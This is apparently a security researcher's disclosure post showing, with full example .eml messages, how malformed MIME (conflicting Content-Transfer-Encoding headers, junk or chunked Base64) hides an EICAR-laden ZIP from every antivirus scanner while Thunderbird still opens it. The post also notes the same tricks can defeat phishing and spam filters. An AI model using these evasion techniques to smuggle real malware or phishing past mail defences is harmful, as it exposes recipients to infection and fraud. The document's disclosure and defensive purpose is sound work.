Please note that republishing this article in full or in part is only allowed under the conditions described here.
Traditionally mails where ASCII-only and limited to 1000 characters per line. The MIME standard defines a way to have a mail structured (multiple parts, including attachments) and to transport non-ASCII data. Unfortunately, the standard is unnecessary complex and flexible, makes contradicting definitions possible and defines no real error handling.
The result of this is that different implementations interpret edge-cases of valid MIME or purposely invalid MIME in different ways. This includes the interpretation in analysis systems like mail filters, IDS/IPS, mail gateways or antivirus, which often interpret specifically prepared mails differently to the end-user system.
This post shows how easy it is to modify a mail with a malicious attachment in a few simple steps, so that at the end no antivirus at Virustotal will be able to properly extract the attachment from the mail and detect the malware. After all this modification it is still possible to open the mail in Thunderbird and access the malicious payload without problems.
Nothing of this is actually really new. I've published similar problems before in 11/2014 and various posts in 07/2015 and also showed how this can be used to bypass proper checking of DKIM signatures. And there is also much older research like this from 2008.
But, the analysis systems are still broken and the vendors either are not aware of these issues or keep quiet about these problems. Therefore it might be useful to show again how trivial such analysis bypass can be done, in the hope that at least some vendors wake up and fix their products. In the following I demonstrate how to hide a malicious attachment from proper analysis in a few simple and easy to follow steps.
We start with a mail containing the innocent EICAR test virus inside a ZIP archive. The mail consists of two MIME parts, the first one being some text and the second one the attachment, encoded with Base64 in order to translate the binary attachment into ASCII for transport. As of today (2018/07/05) 36 (of 59) products at Virustotal are able to detect the malicious payload. The rest is probably not able or not configured to deal with mail files or malware in ZIP archives.
From: firstname.lastname@example.org To: email@example.com Subject: plain Content-type: multipart/mixed; boundary=foo --foo Content-type: text/plain Virus attached --foo Content-type: application/zip; name=whatever.zip Content-Transfer-Encoding: base64 UEsDBBQAAgAIABFKjkk8z1FoRgAAAEQAAAAJAAAAZWljYXIuY29tizD1VwxQdXAMiDaJCYiKMDXR CIjTNHd21jSvVXH1dHYM0g0OcfRzcQxy0XX0C/EM8wwKDdYNcQ0O0XXz9HFVVPHQ9tACAFBLAQIU AxQAAgAIABFKjkk8z1FoRgAAAEQAAAAJAAAAAAAAAAAAAAC2gQAAAABlaWNhci5jb21QSwUGAAAA AAEAAQA3AAAAbQAAAAAA --foo--
We can verify the contents of the mail for example by saving the file with extension .eml and opening it with Thunderbird. It should show an attached ZIP archive named whatever.zip, containing the EICAR test virus.
First we use the same trick which worked in 2015 against AOL Mail: we just add a different Content-Transfer-Encoding header, thus making contradicting statements about how the content is encoded. Most mail clients (including Thunderbird and Outlook) will use the first header and ignore the second, interpreting the following no different from the original mail. Still, even thought the problem should be known for at least 3 years, the detection rate at Virustotal goes down from 36 to 28:
From: firstname.lastname@example.org To: email@example.com Subject: contradicting Content-Transfer-Encoding Content-type: multipart/mixed; boundary=foo --foo Content-type: text/plain Virus attached --foo Content-type: application/zip; name=whatever.zip Content-Transfer-Encoding: base64 Content-Transfer-Encoding: quoted-printable UEsDBBQAAgAIABFKjkk8z1FoRgAAAEQAAAAJAAAAZWljYXIuY29tizD1VwxQdXAMiDaJCYiKMDXR CIjTNHd21jSvVXH1dHYM0g0OcfRzcQxy0XX0C/EM8wwKDdYNcQ0O0XXz9HFVVPHQ9tACAFBLAQIU AxQAAgAIABFKjkk8z1FoRgAAAEQAAAAJAAAAAAAAAAAAAAC2gQAAAABlaWNhci5jb21QSwUGAAAA AAEAAQA3AAAAbQAAAAAA --foo--
The alphabet used in Base64 consists of 64 clearly defined characters, with maybe some '=' at the end. Newline is used to break the encoding into separate lines and should be ignored. But it is not fully clear how an occurance of any other (junk) characters should be handled. The standard suggests but not defines to ignore these characters even though they should not happen in the first place - and this is what almost all implementations actually do. From RFC 2045, section 6.8:
The encoded output stream must be represented in lines of no more than 76 characters each. All line breaks or other characters not found in Table 1 must be ignored by decoding software. In base64 data, characters other than those in Table 1, line breaks, and other white space probably indicate a transmission error, about which a warning message or even a message rejection might be appropriate under some circumstances.
Based on this we insert lots of junk data in the Base64 encoding and end up with a mail which gets only flagged as containing malware by 17 from originally 36 antivirus products:
From: firstname.lastname@example.org To: email@example.com Subject: junk characters inside Base64 combined with contradicting CTE Content-type: multipart/mixed; boundary=foo --foo Content-type: text/plain Virus attached --foo Content-type: application/zip; name=whatever.zip Content-Transfer-Encoding: base64 Content-Transfer-Encoding: quoted-printable U.E.s.D.B.B.Q.A.A.g.A.I.A.B.F.K.j.k.k.8.z.1.F.o.R.g.A.A.A.E.Q. A.A.A.A.J.A.A.A.A.Z.W.l.j.Y.X.I.u.Y.2.9.t.i.z.D.1.V.w.x.Q.d.X. A.M.i.D.a.J.C.Y.i.K.M.D.X.R.C.I.j.T.N.H.d.2.1. j.S.v.V.X.H.1.d.H.Y.M.0.g.0.O.c.f .R.z.c.Q.x.y.0.X.X.0.C./.E.M.8.w.w.K.D.d.Y.N.c.Q.0.O.0.X.X.z. 9.H.F.V.V.P.H.Q.9.t.A.C.A.F.B.L.A.Q.I.U. A.x.Q.A.A.g.A.I.A.B.F.K.j.k.k.8.z.1.F.o.R.g.A.A.A.E.Q .A.A.A.A.J.A.A.A.A.A.A.A.A.A.A.A.A.A.A.C.2.g.Q.A.A.A.A.B.l.a. W.N.h.c.i.5.j.b.2.1.Q.S.w.U.G.A.A.A.A. A.A.E.A.A.Q.A.3.A.A.A.A.b.Q.A.A.A.A.A.A. --foo--
Note that this does not mean that all the affected products cannot deal with junk characters inside Base64. It is more likely that most of these products failed already to detect the original Content-Transfer-Encoding in step 2, but employed a heuristic to detect Base64 encoding no matter where it is. By adding junk characters this heuristic failed.
In this step we go back a bit and no longer use junk characters. Instead we attack the Base64 encoding in a different way: A proper encoding would always take 3 input characters and encode these to 4 output characters. If at the end only one or two input characters are left the output will still be 4 characters, either padded with '==' (one input character) or '=' (two input characters).
This means, that a '=' or '==' should only be at the end of the encoded data. Because of this some decoders will stop at the first '='. Others don't care. For example Thunderbird reads always 4 bytes of encoded data and decodes these and does not change the behavior regarding '=' for encoded data in the middle vs. encoded data at the end. This leads to the idea of not encoding always 3 characters at once but only 2 characters at once, leaving lots of '=' inside the encoding data. Thunderbird will handle this mail the same as the original mail, but the detection rate at Virustotal goes down from 36 to a single vendor:
From: firstname.lastname@example.org To: email@example.com Subject: Base64 encoded in small chunks instead one piece + contradicting CTE Content-type: multipart/mixed; boundary=foo --foo Content-type: text/plain Virus attached --foo Content-type: application/zip; name=whatever.zip Content-Transfer-Encoding: base64 Content-Transfer-Encoding: quoted-printable UEs=AwQ=FAA=AgA=CAA=EUo=jkk=PM8=UWg=RgA=AAA=RAA=AAA=CQA=AAA=ZWk=Y2E=ci4= Y28=bYs=MPU=Vww=UHU=cAw=iDY=iQk=iIo=MDU=0Qg=iNM=NHc=dtY=NK8=VXE=9XQ=dgw= 0g0=DnE=9HM=cQw=ctE=dfQ=C/E=DPM=DAo=DdY=DXE=DQ4=0XU=8/Q=cVU=VPE=0PY=0AI= AFA=SwE=AhQ=AxQ=AAI=AAg=ABE=So4=STw=z1E=aEY=AAA=AEQ=AAA=AAk=AAA=AAA=AAA= AAA=AAA=ALY=gQA=AAA=AGU=aWM=YXI=LmM=b20=UEs=BQY=AAA=AAA=AQA=AQA=NwA=AAA= bQA=AAA=AAA= --foo--
In order to confuse even the last remaining product we again add the junk characters from step 3. This successfully brings down the detection rate from 36 to zero:
From: firstname.lastname@example.org To: email@example.com Subject: chunked Base64 combined with junk characters and contradicting CTE Content-type: multipart/mixed; boundary=foo --foo Content-type: text/plain Virus attached --foo Content-type: application/zip; name=whatever.zip Content-Transfer-Encoding: base64 Content-Transfer-Encoding: quoted-printable UEs=.AwQ=.FAA=.AgA=.CAA=.EUo=.jkk=.PM8=.UWg=.RgA=.AAA=.RAA=.AAA=.CQA=.AAA=. ZWk=.Y2E=.ci4=.Y28=.bYs=.MPU=.Vww=.UHU=.cAw=.iDY=.iQk=.iIo=.MDU=.0Qg=.iNM=. NHc=.dtY=.NK8=.VXE=.9XQ=.dgw=.0g0=.DnE=.9HM=.cQw=.ctE=.dfQ=.C/E=.DPM=.DAo=. DdY=.DXE=.DQ4=.0XU=.8/Q=.cVU=.VPE=.0PY=.0AI=.AFA=.SwE=.AhQ=.AxQ=.AAI=.AAg=. ABE=.So4=.STw=.z1E=.aEY=.AAA=.AEQ=.AAA=.AAk=.AAA=.AAA=.AAA=.AAA=.AAA=.ALY=. gQA=.AAA=.AGU=.aWM=.YXI=.LmM=.b20=.UEs=.BQY=.AAA=.AAA=.AQA=.AQA=.NwA=.AAA=. bQA=.AAA=.AAA=. --foo--
Why adapt the malware if we can just adjust the transport of the malware, to make even widely known malware undetectable. This works by making use of different implementations of the MIME standard, which leads to different interpretations of unusual or invalid data, effectivly making the analysis system blind for the true meaning of the data.
Note that this post is only a small insight into what can be done. I've found many more bypasses, both for content analysis and for extracting the proper filename from the attachment (in order to block .exe, .scr etc). The situation with MIME is about as bad as I described for HTTP.
And, these methods are not restricted to fooling malware analysis. By applying these methods to the text content displayed to the user, they can also be used to fool phishing and spam detection. For example they can be used to make the analysis see gibberish or make it analyze the wrong MIME part, but have the mail displayed as intended for the end user.